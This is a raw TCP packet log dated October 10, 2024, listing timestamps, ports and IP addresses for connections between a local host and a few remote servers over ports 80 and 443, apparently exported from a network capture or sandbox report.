                            Oct 10, 2024 10:17:32.745337009 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.745934963 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.746041059 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.746438980 CEST49775443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.746463060 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.746650934 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.746835947 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.746850967 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.791405916 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.799424887 CEST49775443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.799434900 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.849534988 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.849562883 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.849574089 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.849600077 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.849615097 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.849708080 CEST49775443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.849708080 CEST49775443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.849733114 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.849839926 CEST49775443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.850876093 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.850900888 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.850905895 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.850984097 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.851006031 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.851063013 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.851912975 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.851917982 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.851964951 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.851984024 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.852210999 CEST49775443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.852281094 CEST44349775192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.852349997 CEST49775443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.855710983 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.855737925 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.856079102 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.856093884 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.856368065 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.856458902 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.856512070 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.857290983 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.857403040 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.895989895 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.900041103 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.900173903 CEST44349777192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.900270939 CEST49777443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.947407961 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.947423935 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.947489023 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.947547913 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.947556973 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.947592020 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.948133945 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.948180914 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.948209047 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.948213100 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.948302984 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.948724031 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.948786020 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.948792934 CEST44349776192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:32.948837042 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.980916023 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:32.980916023 CEST49776443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:33.373102903 CEST8049770192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:33.373166084 CEST4977080192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:34.090183973 CEST4977080192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:34.094973087 CEST8049770192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:36.370758057 CEST4977880192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:36.371407986 CEST4977980192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:36.375684977 CEST8049778192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:36.376025915 CEST4977880192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:36.376215935 CEST4977880192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:36.376324892 CEST8049779192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:36.377540112 CEST4977980192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:36.381304979 CEST8049778192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:38.072891951 CEST8049779192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:38.072911024 CEST8049778192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:38.072948933 CEST4977980192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:38.072982073 CEST4977880192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:38.073344946 CEST4977880192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:38.078124046 CEST8049778192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:38.485344887 CEST4977980192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:38.490169048 CEST8049779192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:39.671447992 CEST4978080192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:39.671737909 CEST4978180192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:39.978172064 CEST8049780192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:39.978177071 CEST8049781192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:39.978365898 CEST4978180192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:39.978369951 CEST4978080192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:40.044893980 CEST4978080192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:40.050724983 CEST8049780192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:41.578408957 CEST8049781192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:41.578677893 CEST4978180192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:41.580555916 CEST8049780192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:41.580689907 CEST4978080192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:41.580898046 CEST4978080192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:41.581082106 CEST4978180192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:41.582250118 CEST4978280192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:41.585617065 CEST8049780192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:41.585803986 CEST8049781192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:41.587019920 CEST8049782192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:41.587155104 CEST4978280192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:41.587347031 CEST4978280192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:41.592072010 CEST8049782192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:41.877125978 CEST4978380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:41.883809090 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:41.883929968 CEST4978380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:41.886550903 CEST4977480192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:41.893189907 CEST8049774192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.001391888 CEST8049774192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.001404047 CEST8049774192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.001415968 CEST8049774192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.001645088 CEST4977480192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.243050098 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.243098021 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.243175983 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.243428946 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.243446112 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.243457079 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.243474007 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.243746042 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.244169950 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.244189978 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.713500023 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.714039087 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.714059114 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.716526985 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.716976881 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.717227936 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.717227936 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.717247009 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.717298985 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.719221115 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.719566107 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.719590902 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.720608950 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.720693111 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.721630096 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.721688986 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.721772909 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.767400026 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.821796894 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.821836948 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.821887970 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.821906090 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.821950912 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.824047089 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.824114084 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.824351072 CEST44349784192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.824434042 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.824434042 CEST49784443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.828636885 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.828737020 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.828766108 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.828828096 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.829848051 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.829873085 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.829893112 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.829905987 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.829943895 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.844311953 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:42.844398022 CEST44349785192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:42.844516039 CEST49785443192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:43.174432039 CEST8049782192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:43.174503088 CEST4978280192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:43.175065994 CEST4978280192.168.2.4192.0.33.10
                            Oct 10, 2024 10:17:43.179893970 CEST8049782192.0.33.10192.168.2.4
                            Oct 10, 2024 10:17:44.015598059 CEST8049774192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:44.015697956 CEST4977480192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:45.271120071 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:45.271152020 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:45.271270037 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:45.271755934 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:45.271769047 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:45.911535025 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:45.911621094 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:45.923118114 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:45.923135996 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:45.923388958 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:45.948548079 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:45.995407104 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.054510117 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.054573059 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.054616928 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.054694891 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.054713011 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.054752111 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.054752111 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.139807940 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.139842033 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.139903069 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.139920950 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.139966011 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.140038967 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.142185926 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.142203093 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.142308950 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.142308950 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.142316103 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.142765999 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.226363897 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.226401091 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.226455927 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.226476908 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.226658106 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.227236032 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.227252960 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.227348089 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.227353096 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.227404118 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.227404118 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.228236914 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.228281975 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.228355885 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.228355885 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.228363037 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.228733063 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.230232954 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.230274916 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.230360031 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.230360031 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.230365992 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.230417967 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.313050985 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.313079119 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.313200951 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.313219070 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.313266039 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.313807011 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.313822985 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.313868999 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.313874960 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.313977003 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.313977003 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.314472914 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.314491034 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.314660072 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.314666033 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.315131903 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.315475941 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.315493107 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.315540075 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.315546036 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.315630913 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.315630913 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.316304922 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.316325903 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.316395044 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.316400051 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.316477060 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.317281961 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.317298889 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.317346096 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.317403078 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.317403078 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.317409992 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.317420006 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.317473888 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.317706108 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.317723036 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.317748070 CEST49786443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.317753077 CEST4434978613.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.375408888 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.375442028 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.375504971 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.376712084 CEST49789443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.376754999 CEST4434978913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.376952887 CEST49789443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.378540039 CEST49790443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.378551960 CEST4434979013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.378638983 CEST49790443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.380229950 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.380243063 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.380295038 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.380755901 CEST49792443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.380800962 CEST4434979213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.380872011 CEST49792443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.380959034 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.380975008 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.381289005 CEST49790443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.381299973 CEST4434979013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.381360054 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.381372929 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.381447077 CEST49792443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.381468058 CEST4434979213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.381620884 CEST49789443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:46.381628990 CEST4434978913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:46.715461016 CEST4977480192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:46.720292091 CEST8049774192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:46.836286068 CEST4979380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:46.841033936 CEST8049793192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:46.841120958 CEST4979380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:46.846806049 CEST4978380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:46.851656914 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:47.989037037 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:47.989051104 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:47.989061117 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:47.989115000 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:47.989147902 CEST4978380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:47.989167929 CEST4978380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:47.989989042 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:47.990029097 CEST4978380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:47.991677046 CEST8049783192.0.46.8192.168.2.4
                            Oct 10, 2024 10:17:47.991724014 CEST4978380192.168.2.4192.0.46.8
                            Oct 10, 2024 10:17:47.996059895 CEST4434978913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:47.996974945 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:47.999797106 CEST4434979213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.000157118 CEST4434979013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.002186060 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.004429102 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.004443884 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.005630016 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.005636930 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.006192923 CEST49790443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.006207943 CEST4434979013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.007256985 CEST49790443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.007265091 CEST4434979013.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.007782936 CEST49792443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.007793903 CEST4434979213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.008470058 CEST49792443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.008481979 CEST4434979213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.008816004 CEST49789443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.008827925 CEST4434978913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.009525061 CEST49789443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.009530067 CEST4434978913.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.010335922 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.010355949 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.011146069 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.011157036 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.103708029 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.103779078 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.103826046 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.104746103 CEST4434979213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.104901075 CEST4434979213.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.104948997 CEST49792443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.106456995 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.106486082 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.106524944 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.106534958 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.106802940 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.106847048 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.107433081 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.107445002 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.107455015 CEST49788443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.107460022 CEST4434978813.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.107712984 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.107717037 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.107728004 CEST49791443192.168.2.413.107.246.45
                            Oct 10, 2024 10:17:48.107731104 CEST4434979113.107.246.45192.168.2.4
                            Oct 10, 2024 10:17:48.108819962 CEST4434978913.107.246.45192.168.2.4
